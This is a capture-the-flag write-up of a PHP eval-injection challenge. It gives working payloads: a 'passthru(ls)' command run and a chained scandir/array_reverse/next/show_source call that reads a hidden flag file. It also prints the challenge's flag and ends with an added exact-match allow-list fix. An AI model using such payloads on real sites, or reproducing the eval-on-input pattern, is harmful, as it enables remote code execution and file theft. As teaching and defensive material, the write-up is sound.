
This is the snippet of the source that we're interested in:
```php
if(!isset($_GET["roll"])) {
    show_source(__FILE__);
}
else
{
    // Character allow-list: letters, parentheses, underscore and dot only.
    // No quotes, digits, semicolons or operators pass, but nested calls
    // such as f(g(h())) and constants like __DIR__ are still admitted.
    $wl = preg_match('/^[a-z\(\)\_\.]+$/i', $_GET["roll"]);
    if($wl === 0 || strlen($_GET["roll"]) > 50) {
        die("bumbadum badum");
    }
    // The filtered value is concatenated straight into evaluated PHP code.
    eval("echo ".$_GET["roll"]."();");
}
```
Using the `roll` parameter we can call PHP functions. For example `?roll=passthru(ls)` gives us (the bare `ls` is an undefined constant, which PHP 7 treats as the string `"ls"` since the regex leaves no way to write a quoted string):
```
fl4g_here_but_can_you_get_it_hohoho.php index.php
```
We can read the flag file by constructing a chain of PHP functions. Here's the working payload:
`?roll=show_source(next(array_reverse(scandir(__DIR__))))`
Let's break this down, starting with `scandir`.
`scandir` returns an array containing all files and directories in alphabetical order, including `.` and `..`.
In the case of the challenge that means [0] is `.` and [3] is `index.php`.
Calling `array_reverse` on the `scandir` result reverses that order, so now [0] is `index.php` and [1] is the `fl4g..` file.
Then, by calling `next` on the reversed array, we move the internal pointer by 1 so it's on [1] instead of [0], which returns the `fl4g..` filename, and `show_source` prints it:
```php
<?php
$flagsssssssss = "TetCTF{lixi_50k_<3_vina_*100*25926415724382#}";
?>
```
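For comparison, here is how the same "call a function named by `roll`" feature looks without `eval`. This is an added example, not the challenge's code: the two action names and the `safe_roll` function are hypothetical, and the point is that an exact-match allow-list of names makes the chained payload above (which passes the challenge's character filter) unreachable.

```php
<?php
// Added example, not part of the original challenge.
// The challenge filters characters but still evals the result, so any
// function call built from letters, parentheses and underscores runs.
// Here the user value is only ever used as a lookup key, never as code.

// Hypothetical allow-list: user-facing action name => closure to run.
// Closures (not bare function names) mean call_user_func can never be
// pointed at an arbitrary builtin even if this table were misconfigured.
$allowed = [
    'version' => fn(): string => phpversion(),
    'time'    => fn(): string => date(DATE_ATOM),
];

function safe_roll(array $allowed, ?string $roll): string
{
    if ($roll === null) {
        return "no roll given\n";
    }
    // Exact key match: no regex, no concatenation, no argument passing.
    // 'show_source(next(array_reverse(scandir(__DIR__))))' is simply
    // not a key, so it is rejected like any other unknown value.
    if (!array_key_exists($roll, $allowed)) {
        return "bumbadum badum\n";
    }
    return $allowed[$roll]() . "\n";
}

// Constructed checks: the writeup's payload is refused, a listed name works.
assert(safe_roll($allowed, 'show_source(next(array_reverse(scandir(__DIR__))))') === "bumbadum badum\n");
assert(safe_roll($allowed, 'version') === phpversion() . "\n");

echo safe_roll($allowed, $_GET['roll'] ?? null);
```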
---
Tags: #ctf #php #web